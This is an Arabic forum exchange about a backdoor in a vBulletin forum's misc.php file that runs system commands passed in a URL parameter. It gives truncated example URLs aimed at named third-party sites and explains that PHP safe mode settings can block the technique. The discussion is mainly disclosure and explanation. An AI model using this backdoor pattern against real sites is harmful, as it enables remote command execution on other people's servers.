قلعة العرب:
المنتدى الخاص بك موجود به هذا الباب الخلفي
جرب :
http://mineerva.com/vb/misc.php?acti...cc=somecommand

محسن:
قلت لكم أنني أخبرته بعد أن وجدت المنتدى الخاص به مصاب أيضاً بهذه الثغرة (تم إزالة الملف misc.php لذلك لا احد يحاول الذهاب هناك واختراقه)

أيضاً لا يوجد نظري أو عملي
أنا قلت أن هذا يعتمد على ملف php.ini ولكن من الواضح أن أغلب الخوادم لا يهمها هذا الأمر كثيراً

يعتمد عمل هذا الباب الخلفي أو لا على إعدادات php.ini فمثلاً لو كان على Safe Mode فسيتم إلغاء الدوال التي تنفذ أوامر على النظام مثل
host.sk
جرب مثلاً:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand


ثم هذا:
http://loly.host.sk/vb/misc.php?acti...cc=somecommand

ستعلم أن host.sk آمن بدرجة كبيرة حيث يمنع تنفيذ أوامر باستخدام الـPHP